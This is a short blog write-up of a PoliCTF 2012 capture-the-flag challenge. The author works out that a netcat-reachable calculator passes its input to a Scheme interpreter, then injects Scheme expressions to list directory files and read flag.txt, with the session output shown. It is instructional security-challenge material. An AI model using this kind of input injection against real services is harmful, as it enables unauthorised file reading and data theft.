amon (j. heng)

amon (j. heng)

The Potatosploiter. Pirate of the Seven Proxseas.

PoliCTF 2012 - Bin-Pwn 200

1 minute read

Play with this amazing calculator: calc.challenges.polictf.it:4000

In this challenge, we had to blindly exploit a networked binary in a black box setting. The binary is a calculator that prompts the user for the first number, an operator, and the second number. If the operation was valid it will return the answer else it would hang there.

amon@Alyx:~$ nc calc.challenges.polictf.it 4000
Write the first number:1337
Write the operator:+
Write the second number:1337
2674amon@Alyx:~$

1337 + 1337 = 2674, sure no problem there. However, some odd calculations we tried tipped us off to the true nature of the calculator.

amon@Alyx:~$ nc calc.challenges.polictf.it 4000
Write the first number:1 1 1 1 1 1
Write the operator:+
Write the second number:1
7

amon@Alyx:~$ nc calc.challenges.polictf.it 4000
Write the first number:1 1 1 1 1 1
Write the operator:-
Write the second number:1
-5

1 1 1 1 1 1 + 1 looks weird and should fail but it doesnt. It even yields 7 which is 1 + 1 + 1 + 1 + 1 + 1 + 1. The subtraction operation yields an even weirder answer.

However, it was this operation that really revealed that the interpreter was Scheme.

amon@Alyx:~$ nc calc.challenges.polictf.it 4000
Write the first number:1
Write the operator:<
Write the second number:2
#t

amon@Alyx:~$ nc calc.challenges.polictf.it 4000
Write the first number:2
Write the operator:<
Write the second number:1
#f

Sweet, #t and #f are values in Scheme representing True and False respectively. Now we can expect that the layout of user supplied values would be (operator first_number second_number) e.g. (+ 1 1). Now we understand how the input is passed to an interpreter, a Scheme interpreter, so let’s craft our attack payload.

Objectives for our attack payload:

  1. List files on the disk
    1. Read from file

Listing files may be achieved by the (directory-list) function. Reading from a file may be done by (read (open-input-file “filename”).

Let’s list the files in the current directory:

amon@Alyx:~$ nc calc.challenges.polictf.it 4000
Write the first number:directory-list
Write the operator:
Write the second number:
(flag.txt challenge)

Great, let’s read flag.txt.

amon@Alyx:~$ nc calc.challenges.polictf.it 4000
Write the first number:read (open-input-file "flag.txt")
Write the operator:
Write the second number:
cb1228e2387cc12ad30fd4243fc23a0

Easy.

Flag: cb1228e2387cc12ad30fd4243fc23a0

Leave a Comment

You May Also Enjoy

Cyberpeace 2022 - Crysys (Pwn)

5 minute read

Summary: A minimal binary with only the read libc function and containing a standard stack overflow can be exploited by leveraging a common add-what-where ga...

TetCTF 2022 - Newbie (Pwn)

6 minute read

Summary: An ELF binary contains functionality to generate a ‘hashed’ identifier from two bytes of memory at an offset specified by the user. This ‘hashed’ id...

TetCTF 2022 - EzFlag (Web/Pwn)

14 minute read

Summary: In this two part challenge, flawed filename logic allows an attacker to write arbitrary Python files that are executed as a CGI script. Once the att...